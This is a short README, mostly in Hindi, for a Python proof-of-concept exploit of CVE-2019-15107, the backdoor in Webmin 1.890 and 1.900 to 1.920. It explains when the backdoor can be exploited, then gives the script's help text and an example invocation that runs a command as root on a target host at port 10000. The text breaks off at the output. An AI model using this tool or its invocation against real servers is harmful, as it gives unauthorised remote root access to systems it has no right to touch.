
CVE-2019-15107 एक्सप्लॉइट
Webmin संस्करण 1.890 एक बैकडोर के साथ जारी किया गया था जो इसकी जानकारी रखने वाले किसी भी व्यक्ति को रूट के रूप में कमांड निष्पादित करने की अनुमति दे सकता था। संस्करण 1.900 से 1.920 में भी समान कोड का उपयोग करने वाला एक बैकडोर शामिल था, लेकिन यह डिफ़ॉल्ट Webmin इंस्टॉलेशन में शोषण योग्य नहीं था। केवल तभी जब एडमिन ने Webmin -> Webmin Configuration -> Authentication में समाप्त पासवर्ड बदलने की अनुमति देने के लिए उस सुविधा को सक्षम किया हो, तो इसका उपयोग किसी हमलावर द्वारा किया जा सकता था।
इन पैकेजों को स्थापित करने के लिए आपको pip3 की आवश्यकता है।
$ python3 Webmin_exploit.py --help
usage: Webmin_exploit.py [-h] -host IP [-port Port] [-cmd Command]
Webmin 1.890 expired Remote Root POC
optional arguments:
-h, --help show this help message and exit
-host IP Host to attack
-port Port Port of the host ~ 10000 is Default
-cmd Command Command to execute ~ id is Default
python3 Webmin_exploit.py -host target -port 10000 -cmd id
$ python3 Webmin_exploit.py -host target -port 10000 -cmd id
[